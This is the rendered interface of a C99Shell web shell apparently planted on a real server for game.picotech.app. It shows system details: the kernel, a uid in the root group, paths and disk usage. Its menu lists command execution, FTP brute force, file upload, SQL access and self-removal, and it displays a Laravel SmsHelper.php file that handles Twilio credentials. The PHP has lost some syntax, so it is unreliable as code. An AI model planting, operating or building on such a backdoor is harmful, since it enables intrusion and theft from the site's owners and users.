!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/app/Helpers/   drwxr-xr-x
Free 29.05 GB of 117.98 GB (24.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SmsHelper.php (1.12 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace App\Helpers;
use 
App\Models\Setting;
use 
Twilio\Rest\Client;

class 
SmsHelper {

    public function 
SendSms($to_number ,$type,$order_number null)
    {
        
$setting Setting::first();
        
$code str_split($setting->twilio_country_code);
         
array_pop($code);
        
         
$new_code implode('',$code);
         
$sms_section json_decode($setting->twilio_section,true);

        
        try {
            
// Your Account SID and Auth Token from twilio.com/console
            
$account_sid $setting->twilio_sid;
            
$auth_token $setting->twilio_token;
            
$twilio_number $setting->twilio_form_number;

            
$client = new Client($account_sid$auth_token);
            
$body preg_replace("/{order_number}/"$order_number ,$sms_section[$type]);
           
            
$client->messages->create(
                
$new_code.$to_number,
                array(
                    
'from' => $twilio_number,
                    
'body' => $body,
                )
            );
    
        } catch (
\Throwable $th) {
            
// throw $th;
        
}
      

       
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--